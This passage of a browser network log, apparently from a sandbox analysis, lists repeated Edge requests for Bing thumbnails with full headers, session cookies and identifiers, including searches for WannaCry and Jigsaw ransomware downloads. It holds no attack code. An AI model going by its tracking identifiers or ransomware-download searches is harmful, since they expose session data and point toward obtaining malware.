cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 630
cache-control: public, max-age=355274
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MEM_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c60
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OVP.aqE4sP9v1bMdyZl8BE3tAQHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.aqE4sP9v1bMdyZl8BE3tAQHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 709
cache-control: public, max-age=1809099
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c61
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OVP._tuk1lfZKW8PK4aEorKd0gHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP._tuk1lfZKW8PK4aEorKd0gHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 910
cache-control: public, max-age=862682
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c5f
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OVP.OcR2VM02wfaSVjaVO-cpPQHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.OcR2VM02wfaSVjaVO-cpPQHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1141
cache-control: public, max-age=2427007
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c62
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OVP.M864MWS1hrNJLdtGA07_vQEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.M864MWS1hrNJLdtGA07_vQEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 656
x-check-cacheable: YES
cache-control: public, max-age=1867234
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c46
-
GEThttps://th.bing.com/th?id=OVP.eq6IvB1OchM55kZ53gzG7QHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.eq6IvB1OchM55kZ53gzG7QHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1469
cache-control: public, max-age=2592000
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c48
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OVP.BR_or-utVMYjPIM7sWcTiwDKFo&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.BR_or-utVMYjPIM7sWcTiwDKFo&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7811
x-check-cacheable: YES
cache-control: public, max-age=1197751
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c4a
-
GEThttps://th.bing.com/th?id=OVP.iLVrrwaC8todCnGnzCLPVgFRJY&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.iLVrrwaC8todCnGnzCLPVgFRJY&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 9559
x-check-cacheable: YES
cache-control: public, max-age=211745
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c4f
-
GEThttps://th.bing.com/th?id=OVP.-hzfe8ap5gl12J7rrdqpHQEkII&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.-hzfe8ap5gl12J7rrdqpHQEkII&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1666
x-check-cacheable: YES
cache-control: public, max-age=4482624
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c59
-
GEThttps://th.bing.com/th?id=OVP.AbLjV8fwFxfm0bL_giDSTQDKFo&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.AbLjV8fwFxfm0bL_giDSTQDKFo&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2034
x-check-cacheable: YES
cache-control: public, max-age=5184000
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c5a
-
GEThttps://th.bing.com/th?id=OVP.J7ZZzXHMNRbmsUdbjF2AzQEkII&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.J7ZZzXHMNRbmsUdbjF2AzQEkII&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3685
cache-control: public, max-age=5184000
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c5b
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?q=Wanna+Cry+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1msedge.exeRemote address:92.123.128.169:443RequestGET /th?q=Wanna+Cry+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 552
cache-control: public, max-age=575319
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MEM_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c40
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?q=Free+Ransomware+Removal+Tool&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1msedge.exeRemote address:92.123.128.169:443RequestGET /th?q=Free+Ransomware+Removal+Tool&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 11274
x-check-cacheable: YES
cache-control: public, max-age=1111749
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c54
-
GEThttps://th.bing.com/th?q=Jigsaw.exe+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1msedge.exeRemote address:92.123.128.169:443RequestGET /th?q=Jigsaw.exe+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
